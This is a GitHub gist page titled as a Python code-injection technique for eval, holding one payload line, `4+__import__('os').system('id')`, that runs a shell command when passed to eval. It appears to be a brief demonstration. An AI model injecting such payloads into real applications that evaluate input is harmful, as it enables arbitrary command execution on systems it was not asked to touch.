Created
February 10, 2022 01:49
-
-
Save shollingsworth/e4c985cf32495e1340f5ec38d0cc9a70 to your computer and use it in GitHub Desktop.
python code injection technique eval execution
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # example with number prefix | |
| 4+__import__('os').system('id') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment